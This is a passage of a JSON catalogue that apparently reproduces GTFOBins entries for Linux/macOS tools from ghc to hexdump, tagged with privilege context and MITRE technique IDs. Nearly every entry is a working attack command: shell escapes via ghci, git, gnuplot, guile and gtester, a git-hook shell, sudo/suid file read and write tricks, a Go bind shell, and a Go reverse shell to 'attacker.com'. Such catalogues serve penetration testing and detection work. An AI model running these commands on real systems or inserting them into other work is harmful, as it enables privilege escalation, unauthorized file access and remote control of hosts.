\"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghc/"]},{"id":"gtfo:ghci:shell:0:sudo","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghci/"]},{"id":"gtfo:ghci:shell:0:unprivileged","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghci/"]},{"id":"gtfo:gimp:inherit:0:sudo","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gimp/"]},{"id":"gtfo:gimp:inherit:0:unprivileged","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gimp/"]},{"id":"gtfo:ginsh:shell:0:sudo","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:ginsh:shell:0:suid","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:ginsh:shell:0:unprivileged","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ginsh/"]},{"id":"gtfo:git:file-read:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-read:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-read:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:file-write:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:0:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:1:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:inherit:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:0:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:1:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:suid","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:git:shell:2:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"]},{"id":"gtfo:gnuplot:shell:0:sudo","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:gnuplot:shell:0:suid","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:gnuplot:shell:0:unprivileged","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gnuplot/"]},{"id":"gtfo:go:bind-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:bind-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], []byte{0,0,0,0})\\n\\tsyscall.Bind(fd, addr)\\n\\tsyscall.Listen(fd, 1)\\n\\tnfd, _, _ := syscall.Accept(fd)\\n\\tsyscall.Dup2(nfd, 0)\\n\\tsyscall.Dup2(nfd, 1)\\n\\tsyscall.Dup2(nfd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-read:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-read:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo -e 'package main\\nimport (\\n\\t\"fmt\"\\n\\t\"os\"\\n)\\n\\nfunc main(){\\n\\tb, _ := os.ReadFile(\"/path/to/input-file\")\\n\\tfmt.Print(string(b))\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-write:0:sudo","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:file-write:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -e 'package main\\nimport \"os\"\\nfunc main(){\\n\\tf, _ := os.OpenFile(\"/path/to/output-file\", os.O_RDWR|os.O_CREATE, 0644)\\n\\tf.Write([]byte(\"DATA\\\\n\"))\\n\\tf.Close()\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:reverse-shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:reverse-shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"echo -e 'package main\\nimport (\\n\\t\"os\"\\n\\t\"net\"\\n\\t\"syscall\"\\n)\\n\\nfunc main(){\\n\\tfd, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\\n\\tip := net.ParseIP(\"attacker.com\").To4()\\n\\taddr := &syscall.SockaddrInet4{Port: 12345}\\n\\tcopy(addr.Addr[:], ip)\\n\\tsyscall.Connect(fd, addr)\\n\\tsyscall.Dup2(fd, 0)\\n\\tsyscall.Dup2(fd, 1)\\n\\tsyscall.Dup2(fd, 2)\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, os.Environ())\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:shell:0:sudo","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:go:shell:0:unprivileged","toolId":"gtfo:go","toolName":"go","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'package main\\nimport \"syscall\"\\nfunc main(){\\n\\tsyscall.Exec(\"/bin/sh\", []string{\"/bin/sh\", \"-i\"}, []string{})\\n}' >/path/to/temp-file.go\ngo run /path/to/temp-file.go","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/go/"]},{"id":"gtfo:grc:shell:0:sudo","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grc/"]},{"id":"gtfo:grc:shell:0:unprivileged","toolId":"gtfo:grc","toolName":"grc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"grc --pty /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grc/"]},{"id":"gtfo:grep:file-read:0:sudo","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:grep:file-read:0:suid","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:grep:file-read:0:unprivileged","toolId":"gtfo:grep","toolName":"grep","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/grep/"]},{"id":"gtfo:gtester:file-write:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:file-write:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:file-write:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"gtester DATA -o /path/to/output-file","description":"Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:sudo","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:suid","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh -p' >/path/to/temp-file\necho 'exec /bin/sh -p 0<&1' >>/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:gtester:shell:0:unprivileged","toolId":"gtfo:gtester","toolName":"gtester","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&1' >/path/to/temp-file\nchmod +x /path/to/temp-file\ngtester -q /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gtester/"]},{"id":"gtfo:guile:shell:0:sudo","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:guile:shell:0:suid","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:guile:shell:0:unprivileged","toolId":"gtfo:guile","toolName":"guile","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"guile -c '(system \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/guile/"]},{"id":"gtfo:gzip:file-read:0:capabilities","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:sudo","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:suid","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:gzip:file-read:0:unprivileged","toolId":"gtfo:gzip","toolName":"gzip","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gzip -c /path/to/input-file | gzip -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gzip/"]},{"id":"gtfo:hashcat:file-write:0:sudo","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hashcat/"]},{"id":"gtfo:hashcat:file-write:0:unprivileged","toolId":"gtfo:hashcat","toolName":"hashcat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash\nhashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist","description":"Append data to the end of the output file, creating if does not exist.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/hashcat/"]},{"id":"gtfo:head:file-read:0:sudo","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:head:file-read:0:suid","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:head:file-read:0:unprivileged","toolId":"gtfo:head","toolName":"head","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"head -c-0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/head/"]},{"id":"gtfo:hexdump:file-read:0:sudo","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hexdump:file-read:0:suid","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The output is actually an hex dump.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/hexdump/"]},{"id":"gtfo:hexdump:file-read:0:unprivileged","toolId":"gtfo:hexdump","toolName":"hexdump","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"hd /path/to/input-file","description":"The 